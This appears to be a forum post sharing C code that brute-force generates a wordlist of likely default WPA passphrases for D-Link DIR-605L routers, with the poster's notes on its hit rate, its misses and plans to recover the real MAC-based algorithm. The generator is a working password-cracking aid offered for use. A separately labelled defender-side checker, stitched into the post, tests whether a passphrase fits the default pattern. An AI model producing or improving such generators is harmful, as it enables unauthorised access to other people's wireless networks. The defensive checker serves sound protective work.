Keyspace List for WPA on Default Routers
Hacked together some C code. Catches 17 out of the 19 dir605l passwords I've collected. It generates a 50G dictionary in about 20 minutes. There are quite a few identical passwords in the rainbow table, so sort -u will help cut it in half.

It misses when the length of the combined four bytes is less than what is needed to fill the password.
e.g. febii86601 --> 5418886601 cannot be split into 4 bytes, you'd need 5 bytes.
54 188 86 60 1
(although in this case you could flip left to right and get there, but then you'd miss on a different password in my collection)
Instead of the padding "000000" you'd need to do something a bit more clever to fill the remainder to get to 10 chars, some sort of recursive loop. I'm sure an actual programmer can figure that out!

Of course I'd rather have the real algorithm, but this can work until that is discovered. 
Working backwards from the password may work: password --> bytes --> ?math? <-- mac  
Maybe I'll give that a whirl tomorrow.

Code:
#include <stdio.h>

int main(void) {
    int byte1, byte2, byte3, byte4;
    char buffer[20]; /* longest string: 12 digits + 6 padding + NUL = 19 bytes */
    int pos;

    for (byte1 = 0; byte1 < 256; byte1++) {
        for (byte2 = 0; byte2 < 256; byte2++) {
            for (byte3 = 0; byte3 < 256; byte3++) {
                for (byte4 = 0; byte4 < 256; byte4++) {
                    /* four bytes printed as decimal, then the padding */
                    snprintf(buffer, sizeof buffer, "%d%d%d%d%s",
                             byte1, byte2, byte3, byte4, "000000");
                    /* shift the first five digits '0'-'9' to letters 'a'-'j' */
                    for (pos = 0; pos < 5; pos++)
                        buffer[pos] = buffer[pos] + 49;
                    buffer[10] = 0; /* trim to first 10 chars */
                    printf("%s\n", buffer);
                }
            }
        }
    }
    return 0;
}
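A defender-side check, added here and not part of the original post: it tests whether a passphrase has the shape this generator emits and whether the four-byte decomposition covers it, reproducing the febii86601 miss described above. `fits` and `classify_psk` are hypothetical names, and the shape (five letters a-j, then five digits) is inferred from the posted code, not from the router's real algorithm.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Added example, not the poster's code. s holds 10 decimal digits. Returns 1
 * if the generator in the post can emit s: four bytes printed with %d,
 * followed by "000000", trimmed to 10 characters. */
static int fits(const char *s, int pos, int bytes_left) {
    if (pos >= 10) return 1;              /* anything further is trimmed off */
    if (bytes_left == 0)                  /* only padding zeros may follow */
        return strspn(s + pos, "0") == (size_t)(10 - pos);
    for (int len = 1; len <= 3; len++) {
        if (len > 1 && s[pos] == '0') break;   /* %d prints no leading zeros */
        int val = 0;
        for (int i = 0; i < len; i++)     /* digits past the trim are free: use 0 */
            val = val * 10 + (pos + i < 10 ? s[pos + i] - '0' : 0);
        if (val <= 255 && fits(s, pos + len, bytes_left - 1)) return 1;
    }
    return 0;
}

/* 0 = not the generator's output shape (5 letters a-j, then 5 digits)
 * 1 = that shape, but outside the generated list (the "miss" case)
 * 2 = inside the generated list */
int classify_psk(const char *psk) {
    char digits[11];
    if (strlen(psk) != 10) return 0;
    for (int i = 0; i < 10; i++) {
        if (i < 5 && psk[i] >= 'a' && psk[i] <= 'j')
            digits[i] = (char)(psk[i] - 'a' + '0');   /* undo the +49 shift */
        else if (i >= 5 && isdigit((unsigned char)psk[i]))
            digits[i] = psk[i];
        else
            return 0;
    }
    digits[10] = '\0';
    return fits(digits, 0, 4) ? 2 : 1;
}

int main(void) {
    /* febii86601 is quoted in the post; the other values are constructed. */
    const char *samples[] = { "febii86601", "bcdef67800", "cffcf52552", "kzzzz12345" };
    for (int i = 0; i < 4; i++)
        printf("%s -> %d\n", samples[i], classify_psk(samples[i]));
    return 0;
}
```

A result of 1 or 2 means the passphrase still follows the default pattern, whose keyspace is at most 10^10 candidates, so it is worth replacing with a long random one.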


Messages In This Thread
RE: Keyspace List for WPA on Default Routers - by drsnooker - 01-12-2025, 10:07 AM